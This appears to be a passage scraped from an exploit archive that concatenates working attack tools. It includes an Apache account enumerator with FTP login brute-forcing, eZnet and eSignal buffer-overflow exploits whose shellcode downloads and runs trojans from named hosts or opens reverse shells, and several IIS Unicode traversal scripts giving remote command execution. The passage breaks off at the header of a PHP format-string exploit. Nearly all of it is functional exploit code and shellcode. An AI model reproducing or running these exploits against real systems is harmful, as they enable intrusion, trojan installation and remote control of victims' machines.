printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}
if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}
logz = (char **)malloc(0x666);
printf(" Checking http server [%s:%i]...\n",host,port);
hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);
hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);
printf("\n Searching for system accounts...");
if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}
x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;
printf("\n %s \t=> ",buf);
hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf(" Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);
sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf(" Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}
}
/* m00 */
// [2003-12-06]
80 Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit
#!/usr/bin/perl -w
#
# Stack Overflow in eZnet.exe - Remote Exploit
#
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
#
# For this exploit I have tried several strategies to increase
# reliability and performance:
#
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
# since the stack address seems to change for each version of
# eznet.
# + Works out the byte difference for custom urls
# (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
#
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [[email protected]]
use IO::Socket;
if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
" + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
" + listens on port 9999.\n\n";
exit;
}
print "eZnet.exe remote trojan downloader exploit\n";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on port 80";
$tlen = chr(length($ARGV[1]) + 1);
$shellcode = "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
"\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
"\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
"\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
"\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
"\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
$tlen .
"\x57\x8D\x7F\x09\x47\x57\x8D" .
"\x54\x24\x14\x52\xEB\x02\xEB\x52" .
"\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
"\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
"\x36\x50\xFF\x15\xCC\x90\x04\x10" .
"\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
"\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
"\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
"\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
"\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
"\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
"\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
"\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
"\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
"\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
"\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
"\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
"\x45\x78\x65\x63\xFF" . $ARGV[1] .
"\xFF" .
"\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
"\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
"\x33\x32\x2E\x64\x6C\x6C\xFF";
$jmpcode = "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";
$eip = "\xBB\x33\x05\x10";
$packet = "" .
"GET /SwEzModule.dll?operation=login&autologin=" .
"\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
"\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
print $victim $packet;
print " + Making Request ...\n + Trojan should download - best of luck!\n";
sleep(4);
close($victim);
print "Done.\n";
exit;
#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ; (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
#
# bits 32
#
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [100490cch] ; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [100490cch] ; GetProcAddress("kernel32.dll", WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------
#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [[email protected]]
#
# ;100533BBh
#
# bits 32
#
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------
# [2003-12-15]
80 Eznet 3.5.0 Remote Stack Overflow Universal Exploit
#!/usr/bin/perl -w
#########C###O###R###O###M###P###U###T###E###R#### #######
# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] #
#----------------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2 #
# versions tested & vulnerables: v3.3 v3.4 v3.5 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to #
# finally reach the shellcode. The shellcode gives a reverse remote shell. #
# Universal shellcode coded by kralor with the PEB technic. #
######W#W#W#.#C#O#R#O#M#P#U#T#E###R###.###N###E### T######
use IO::Socket;
print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";
if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
exit;
}
print "[+] Connecting to ".$ARGV[0]."\t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}
print "Done\r\n";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ($ - 4'608)
$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\x ec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x 01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x 1e\xd5\x99\x1e".
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\x e1\xb1\x91\xad".
"\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\x ce\xed\x96\x4d".
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x 1e\xc6\xb5\x96".
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\x b1\x81\x1e\xa3".
"\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\x cd\xa6\x55\x56".
"\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x 91\x92\x56\x1e".
"\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\x d0\xed\xd4\xff".
"\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\x d0\x69\xe2\xe6".
"\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x 48\xf3\x16\x7e".
"\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\x e7\xf0\xe6\xe6".
"\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x 91\xa6\x6a\x52".
"\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\x f0\x1c\xe8\x91".
"\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\x c4\xc6\x6a\x45".
"\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x 1c\xd0\x31\xfd".
"\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x 6a\x6a\x6a\xa6".
"\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x 97";
$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
"\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x 40\x6b\x6a\x6a".
"\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x 1c\xc8\x2d\x1c".
"\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\x c8\x5d\x52\xd0".
"\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\x c8\x31\x1c\xc8".
"\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\x c4\x18\xd8\x39".
"\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\x f6\xf8\xf3\x52".
"\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x 6a\x45\xa6\x4e".
"\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x 6b\x6a\x6a\x6a".
"\x45\x95";
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);
$paddr=substr($paddr,2,6);
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);
$request = "GET /SwEzModule.dll?operation=login&autologin=".
"\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
"\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";
print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;
# [2003-12-18]
80 eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#
use IO::Socket;
sub usage
{
die("\nUsage: perl $0 host port\n");
}
print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";
#
# Used api..
#
$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.d ll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\x E8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x 5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x 12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x 02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x 55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x 57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x 5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x 55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x 50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x 33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x 50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x 50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x 52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x 80\x80\x80\xFF\xE0$fname";
$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\x fc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";
#
# xor data block
#
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};
$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "\r\n";
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "\n";
print sendraw($data);
print "[+] Overflow sent / file executed!\n";
exit;
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...\n"); }}
# [2004-03-26]
80 MS Windows IIS Unicode Remote Transversal Bug
/* ii*** iis exploit (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <[email protected]>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("try %s www.server.com\n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
printf ("by incubus <[email protected]>\n\n");
exit(0);
}
printf ("\nii*** - iis 4 and 5 exploit\n---------------------------\n");
printf ("act like a cmd.exe kiddie, type quit to quit.\n");
for (;;)
{
printf ("\n[enter cmd> ");
gets(buf);
if (strstr(buf, "quit")) exit(0);
i=0;
while (buf[i] != '\n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}
name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0\n\n");
send(sock, buffy, sizeof(buffy), 0);
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}
// [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (2)
/************************************************** **************************\
** **
** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit **
** proof of theory exploit cuz it's wednesday and i'm on the couch **
** **
** brought to you by the letter B, the number 7, optyx, and t12 **
** optyx - <[email protected] [email protected]> **
** t12 - <[email protected]> **
** **
** greetz go out to aempirei, a gun toatin' gangstah' hustler' player **
** mother****er who isn't with us anymore, miah, who's GTA2 game was **
** was most entertaining tonight, Cathy, who provided the trippy light **
** to stare at, and to KT, for providing me with hours of decent **
** conversation. **
** **
\************************************************* ***************************/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
void usage(void)
{
fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>");
fprintf(stderr, " [-p port] [-t timeout]\n");
exit(-1);
}
int main(int argc, char **argv)
{
int i, j;
int port=80;
int timeout=3;
int interactive=0;
char temp[1];
char host[512]="";
char cmd[1024]="";
char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
struct hostent *he;
struct sockaddr_in s_addr;
printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\ n");
printf("by optyx and t12\n");
for(i=0;i<argc;i++)
{ if(argv[i][0] == '-') {
for(j=1;j<strlen(argv[i]);j++)
{
switch(argv[i][j])
{
case 't':
strncpy(host, argv[i+1], sizeof(host));
break;
case 'c':
strncpy(cmd, argv[i+1], sizeof(cmd));
break;
case 'h':
usage();
break;
case 'o':
timeout=atoi(argv[i+1]);
break;
case 'p':
port=atoi(argv[i+1]);
break;
case 'i':
interactive=1;
break;
default:
break;
}
}
}
}
if(!strcmp(host, ""))
{
fprintf(stderr, "specify target host\n");
usage();
}
if(!strcmp(cmd, "") && !interactive)
{
fprintf(stderr, "specify command to execute\n");
usage();
}
printf("]- Target - %s:%d\n", host, port);
if(!interactive)
printf("]- Command - %s\n", cmd);
printf("]- Timeout - %d seconds\n", timeout);
if((he=gethostbyname(host)) == NULL)
{
fprintf(stderr, "invalid target\n");
usage();
}
do
{
if(interactive)
{
cmd[0]=0;
printf("\nC> ");
if(fgets(cmd, sizeof(cmd), stdin) == NULL)
fprintf(stderr, "gets() error\n");
cmd[strlen(cmd)-1]='\0';
if(!strcmp("exit", cmd))
exit(-1);
}
for(i=0;i<strlen(cmd);i++)
{
if(cmd[i]==' ')
cmd[i]='+';
}
strncpy(request,
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "\n", sizeof(request) - strlen(request));
s_addr.sin_family = PF_INET;
s_addr.sin_port = htons(port);
memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr,
sizeof(s_addr.sin_addr));
if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
fprintf(stderr, "cannot create socket\n");
exit(-1);
}
alarm(timeout);
j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
alarm(0);
if(j==-1)
{
fprintf(stderr, "cannot connect to %s\n", host);
exit(-1);
close(i);
}
if(!interactive)
printf("]- Sending request: %s\n", request);
send(i, request, strlen(request), 0);
if(!interactive)
printf("]- Getting results\n");
while(recv(i,temp,1, 0)>0)
{
alarm(timeout);
printf("%c", temp[0]);
alarm(0);
}
}
while(interactive);
close(i);
return 0;
}
// [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (3)
#!/usr/bin/perl
#
# IIS 4.0/5.0 Unicode Exploit
# Checks for each script that has been posted on the BugTraq Lis
# Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others
# Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will
# log sites in the log_unicode.log.
# So Simple
# Use Socket
use Socket;
# incase no arguements or less arguements are given
if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n".
"Programmed by SteeLe\n".
"Usage: ./$0 <single host> <dir for exploit>\n"; }
# Variables
$blah = $ARGV[0];
$port = 80;
$dir = $ARGV[1];
$timeout = 4;
# see if file is there,
if (-e "$blah") {
open(T, "$blah") || die "can't open $blah\n";
@target = <T>;
close(T);
}
else { @target[0] = $blah; } # what you think is blah
# all scripts mentioned on bugtraq, we know rfp knows more.
@scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..",
"..%c1%pc.."); # blah, i know i'm not l33t
# Open LOG Script
open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n";
# Socket Stuff
foreach $script (@scripts) {
$submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r";
$ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir";
foreach $site (@target) {
unless(fork()) {
chop($site) if $site =~ /\n$/; &connect($site);
} # so i lied
}
}
sub connect { # real socket stuff
my ($ste) = @_;
$iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) };
alarm $timeout;
socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste");
connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n";
send(SCAN, $submit, 0);
$blackout = <SCAN>;
($http,$code,$blah) == split(/ /, $blackout);
if ($code == "200") {
print "$ste has $ouch on there, go exploit it\n";
print LOG "$ste has $ouch on there\n";
}
else { print "$ste doesn't have it\n"; }
close(SCAN);
exit(0);
}
close(LOG);
# since we're done
exit;
# [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (4)
#!/usr/bin/perl
#
# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
#
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to [email protected] for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# [email protected] http://www.sensepost.com
use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
print "Sensepost.exe not found - Copying CMD...\n";
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /copied/ )) {$failed2=0;}
}
if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}
# ------------ we can assume that the cmd.exe is copied from here..
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP [email protected]
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
# [2000-11-18]
80 PHP 3.0.16/4.0.2 Remote Format Overflow Exploit
/*
* PHP 3.0.16/4.0.2 remote format overflow exploit.
* Copyright (c) 2000
* Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau
* [email protected]
* my regards to sheib and darkx
* All rights reserved
* Pascal Boucheraine's paper was enlightening
* THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS CODE.
* YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS AND I CANNOT BE HELD RESPONSIBLE
* FOR THE CONSEQUENCES
* Usage:
* phpxpl -sx -uwww.victim.com/some.php3 | nc www.victim.com 80
*
* Slackware 7.0: eip address/shellcode address
* 0xbfff9b90/0xbfff958c
*
*/
/*
